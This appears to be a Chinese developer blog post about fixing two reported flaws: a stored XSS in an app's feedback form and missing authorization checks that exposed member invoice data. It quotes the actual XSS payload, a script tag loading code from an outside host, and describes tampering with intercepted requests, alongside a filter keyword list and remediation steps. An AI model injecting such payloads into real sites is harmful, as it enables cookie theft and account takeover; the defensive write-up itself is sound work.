某天早上打开邮箱看到网警邮件告知”跨站脚本攻击“---XSS(存储型)
威胁描述
:跨站脚本攻击简称为 XSS 又叫 CSS (Cross Site Script
Execution),是指服务器端的 CGI 程序没有对用户提交的变量中的
HTML 代码进行有效的过滤或转换,允许攻击者往 WEB 页面里插入
对终端用户造成影响或损失的 HTML 代码。所造成的影响主要是窃
取用户登录凭证(Cookies)、挂马攻击、页面访问挟持等。
范围:from表单提交---APP内嵌H5页面
漏洞 URL
:
http://api-service.XXXXX.com/api/feedback/add?rcode=6200&time=1583133341&sign=47c8a6dd58d71c13f4529f1127ceb10f
输入内容,并插入 XSS 代码:我就是来搞事的<sCript sRC=//xs.ax/BPVI></sCrIpT>
成功提交,还是没大佬来搞事,先不说了
先补锅,先补锅,先补锅:No.1不让在客户端提交此类特殊表单,但这只是拦在门外的方法;No.2接口增加验证;
验证修复:
1. 对用户输入的数据进行严格过滤,包括但不限于以下字符及字
符串 Javascript script src img onerror { } ( ) < > = , . ; :
"" ' # ! & / * \
2. 根据页面的输出背景环境,对输出进行编码
3. 使用一个统一的规则和库做输出编码
4. 对于富文本框,使用白名单控制输入,而不是黑名单
5. 在 Cookie 上设置 HTTPOnly 标志,从而禁止客户端脚本访问
Cookie。
一波未停一波又起,又来邮件emmmm---
敏感信息泄露
威胁描述
:造成大量客户的个人信息泄漏
范围:登录用户信息,增删改其他用户记录---APP,赠票资质
漏洞 url:https://XX.XXXXX.cn/member/invoice
拦截并修改数据:查找页面元素,抓包工具拦截请求并修改,从而达到效果
先补锅,先补锅,先补锅:请求增加用户权限验证
验证修复:
1.对用户操作进行权限校验,防止通过修改参数进入未授权页面及
进行非法操作,建议在服务端对请求的数据和当前用户身份做一个
校验检查。流程描述:在服务器接收到用户发送的页面访问请求时,
根据预设的识别策略,从用户的页面访问请求中提取该用户对应的
用户唯一标识信息,同时提取所述页面访问请求对应的应答页面中
的表单及该表单中不可修改参数,将所述表单及不可修改参数与所
述用户唯一标识信息绑定后记录到参数列表中;检测到用户提交请
求页面的表单时,将所述请求页面的表单及不可修改参数与该用户
对应的所述参数列表中记录的表单及不可修改参数进行比对,控制
该用户的访问
1562
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
